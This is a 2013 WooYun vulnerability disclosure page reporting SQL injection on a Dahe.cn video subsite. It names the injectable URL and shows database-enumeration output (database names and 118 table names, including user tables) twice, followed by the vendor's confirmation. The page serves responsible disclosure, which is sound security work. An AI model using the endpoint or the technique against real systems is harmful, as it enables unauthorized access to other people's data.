当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037044

漏洞标题:大河网某站存在SQL注射漏洞

相关厂商:大河网

漏洞作者: m1x7e1

提交时间:2013-09-14 11:18

修复时间:2013-10-29 11:18

公开时间:2013-10-29 11:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-14: 细节已通知厂商并且等待厂商处理中
2013-09-14: 厂商已经确认,细节仅向厂商公开
2013-09-24: 细节向核心白帽子及相关领域专家公开
2013-10-04: 细节向普通白帽子公开
2013-10-14: 细节向实习白帽子公开
2013-10-29: 细节向公众公开

简要描述:

大河网SQL注射

详细说明:

地址:http://v.dahe.cn/index.php?option=com_content&ItemId=91%20ItemId=91

01.png


02.png


available databases [5]:
[*] `cis2.1`
[*] information_schema
[*] mysql
[*] shinyv_cis_mms4_2_demo
[*] test
Database: `cis2.1`
[118 tables]
+-----------------------------------+
| shinyv_ad |
| shinyv_ad_list_manager |
| shinyv_admintype |
| shinyv_album |
| shinyv_album_cate |
| shinyv_album_content |
| shinyv_album_favorites |
| shinyv_album_top |
| shinyv_album_url |
| shinyv_albumandfeature_categories |
| shinyv_area |
| shinyv_banner |
| shinyv_bannerclient |
| shinyv_bannerfinish |
| shinyv_blog_cate |
| shinyv_blog_outline |
| shinyv_categories |
| shinyv_categories_tag |
| shinyv_code_converter |
| shinyv_commend_tag |
| shinyv_components |
| shinyv_contact_details |
| shinyv_content |
| shinyv_content_chat |
| shinyv_content_comment |
| shinyv_content_extra |
| shinyv_content_frontpage |
| shinyv_content_rating |
| shinyv_content_top |
| shinyv_core_acl_aro |
| shinyv_core_acl_aro_groups |
| shinyv_core_acl_aro_sections |
| shinyv_core_acl_groups_aro_map |
| shinyv_core_log_items |
| shinyv_core_log_searches |
| shinyv_download_servers |
| shinyv_elite_order |
| shinyv_extra |
| shinyv_extra_section_categories |
| shinyv_firendgroup_categories |
| shinyv_focus_comment |
| shinyv_group_content |
| shinyv_group_focus |
| shinyv_group_focus_top |
| shinyv_group_member |
| shinyv_group_top |
| shinyv_groups |
| shinyv_ip_config |
| shinyv_ip_item |
| shinyv_ip_stactic |
| shinyv_languagereplace |
| shinyv_league |
| shinyv_league_cate |
| shinyv_leave |
| shinyv_log |
| shinyv_log_setting |
| shinyv_mambots |
| shinyv_member_right |
| shinyv_member_saw_video |
| shinyv_menu |
| shinyv_messages |
| shinyv_messages_cfg |
| shinyv_modules |
| shinyv_modules_menu |
| shinyv_newpm |
| shinyv_news_image |
| shinyv_newsfeeds |
| shinyv_ordering_tmp |
| shinyv_pms |
| shinyv_poll_data |
| shinyv_poll_date |
| shinyv_poll_menu |
| shinyv_polls |
| shinyv_resource_categories |
| shinyv_resource_image |
| shinyv_resource_servers |
| shinyv_search_top |
| shinyv_section_top |
| shinyv_sections |
| shinyv_session |
| shinyv_site_user |
| shinyv_site_user_fields |
| shinyv_special |
| shinyv_special_content |
| shinyv_special_leave |
| shinyv_static_info |
| shinyv_static_page_setting |
| shinyv_stats_agents |
| shinyv_tag_info |
| shinyv_tags_section_top |
| shinyv_tags_top |
| shinyv_template_positions |
| shinyv_template_private |
| shinyv_template_user |
| shinyv_templates |
| shinyv_templates_default |
| shinyv_templates_files |
| shinyv_templates_menu |
| shinyv_templates_section |
| shinyv_templates_tags |
| shinyv_timebyplay |
| shinyv_user_detail |
| shinyv_user_favourites |
| shinyv_user_friend |
| shinyv_user_friendgroup |
| shinyv_user_group |
| shinyv_user_mail |
| shinyv_user_subscribe |
| shinyv_users |
| shinyv_usertypes |
| shinyv_video_info |
| shinyv_video_my_play_list |
| shinyv_web_site |
| shinyv_weblinks |
| shinyv_webservice_import |
| shinyv_widget |
| shinyv_widget_cate |
| shinyv_widget_private |
+-----------------------------------+

漏洞证明:

02.png


available databases [5]:
[*] `cis2.1`
[*] information_schema
[*] mysql
[*] shinyv_cis_mms4_2_demo
[*] test
Database: `cis2.1`
[118 tables]
+-----------------------------------+
| shinyv_ad |
| shinyv_ad_list_manager |
| shinyv_admintype |
| shinyv_album |
| shinyv_album_cate |
| shinyv_album_content |
| shinyv_album_favorites |
| shinyv_album_top |
| shinyv_album_url |
| shinyv_albumandfeature_categories |
| shinyv_area |
| shinyv_banner |
| shinyv_bannerclient |
| shinyv_bannerfinish |
| shinyv_blog_cate |
| shinyv_blog_outline |
| shinyv_categories |
| shinyv_categories_tag |
| shinyv_code_converter |
| shinyv_commend_tag |
| shinyv_components |
| shinyv_contact_details |
| shinyv_content |
| shinyv_content_chat |
| shinyv_content_comment |
| shinyv_content_extra |
| shinyv_content_frontpage |
| shinyv_content_rating |
| shinyv_content_top |
| shinyv_core_acl_aro |
| shinyv_core_acl_aro_groups |
| shinyv_core_acl_aro_sections |
| shinyv_core_acl_groups_aro_map |
| shinyv_core_log_items |
| shinyv_core_log_searches |
| shinyv_download_servers |
| shinyv_elite_order |
| shinyv_extra |
| shinyv_extra_section_categories |
| shinyv_firendgroup_categories |
| shinyv_focus_comment |
| shinyv_group_content |
| shinyv_group_focus |
| shinyv_group_focus_top |
| shinyv_group_member |
| shinyv_group_top |
| shinyv_groups |
| shinyv_ip_config |
| shinyv_ip_item |
| shinyv_ip_stactic |
| shinyv_languagereplace |
| shinyv_league |
| shinyv_league_cate |
| shinyv_leave |
| shinyv_log |
| shinyv_log_setting |
| shinyv_mambots |
| shinyv_member_right |
| shinyv_member_saw_video |
| shinyv_menu |
| shinyv_messages |
| shinyv_messages_cfg |
| shinyv_modules |
| shinyv_modules_menu |
| shinyv_newpm |
| shinyv_news_image |
| shinyv_newsfeeds |
| shinyv_ordering_tmp |
| shinyv_pms |
| shinyv_poll_data |
| shinyv_poll_date |
| shinyv_poll_menu |
| shinyv_polls |
| shinyv_resource_categories |
| shinyv_resource_image |
| shinyv_resource_servers |
| shinyv_search_top |
| shinyv_section_top |
| shinyv_sections |
| shinyv_session |
| shinyv_site_user |
| shinyv_site_user_fields |
| shinyv_special |
| shinyv_special_content |
| shinyv_special_leave |
| shinyv_static_info |
| shinyv_static_page_setting |
| shinyv_stats_agents |
| shinyv_tag_info |
| shinyv_tags_section_top |
| shinyv_tags_top |
| shinyv_template_positions |
| shinyv_template_private |
| shinyv_template_user |
| shinyv_templates |
| shinyv_templates_default |
| shinyv_templates_files |
| shinyv_templates_menu |
| shinyv_templates_section |
| shinyv_templates_tags |
| shinyv_timebyplay |
| shinyv_user_detail |
| shinyv_user_favourites |
| shinyv_user_friend |
| shinyv_user_friendgroup |
| shinyv_user_group |
| shinyv_user_mail |
| shinyv_user_subscribe |
| shinyv_users |
| shinyv_usertypes |
| shinyv_video_info |
| shinyv_video_my_play_list |
| shinyv_web_site |
| shinyv_weblinks |
| shinyv_webservice_import |
| shinyv_widget |
| shinyv_widget_cate |
| shinyv_widget_private |
+-----------------------------------+

修复方案:

管理员会修复的。

版权声明:转载请注明来源 m1x7e1@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-14 11:19

厂商回复:

收到,通知技术人员修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-16 13:42 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    为啥我发的走小漏洞来着!

  2. 2013-09-16 14:19 | m1x7e1 ( 普通白帽子 | Rank:543 漏洞数:132 | 求工作)

    我还有几个是待审核呢。纠结啊。